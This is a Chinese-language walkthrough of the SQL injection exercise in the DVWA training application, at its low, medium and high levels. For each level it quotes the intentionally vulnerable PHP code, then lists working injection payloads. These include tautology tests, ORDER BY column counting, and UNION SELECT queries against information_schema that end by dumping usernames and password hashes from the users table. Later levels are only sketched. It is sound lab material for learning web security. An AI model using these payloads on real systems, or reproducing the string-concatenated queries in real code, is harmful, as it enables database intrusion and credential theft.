low级
low级源代码
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
1.先进行简单的ID查询
输入输入正确的ID,将显示ID First name,Surname信息。
2.检测是否可以注入 可知此位为注入点,输入:‘ 返回错误
3.尝试遍历数据库表,提示输入的值是ID,可以初步判断此处为数字类型的注入。
尝试输入:1 or 1=1
没有达到目的,再尝试:1' or' 1' =' 1
显示出数据库中所有内容。
4.查询字段数
1’order by Num#
查询信息列表长度
Num 从1开始测试,输入1’order by 1#
正常显示。
当Num输入到3 时,页面报错。
由此我们判断查询结果值为2列。
5.联合查询
输入:1’ union select 1,2#
再查询,输入:1’ union select 1,2,3#
可知,含有两字段。
6.综合查询
查询所有库所有表1' union select table_name,table_schema from information_schema.tables #
统计每库中表的数量
1' UNION select table_schema,count(*) FROM information_Schema.tables group by table_schema
DVWA 中的表名
1' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'#
user 表中的所有列
1' union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'#
查询 user、password列的内容
1' union select user,password from dvwa.users#
Medium 级
Medium源代码
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>
此级别利用Burp Suite 或者hackbar
判断显示行数
圈中部分修改为
id=1 order by 2 &Submit=Submit
判断数据库名称
id=1 union select 1,2 &Submit=Submit
.
.
.
.
.
…
其他操作与low级相同。
查询 user、password列的内容
high 级
high级源代码
<?php
if( isset( $_SESSION [ 'id' ] ) ) {
// Get input
$id = $_SESSION[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
判断行数,行数为2
判断数据库名称
其他的步骤与低级相同。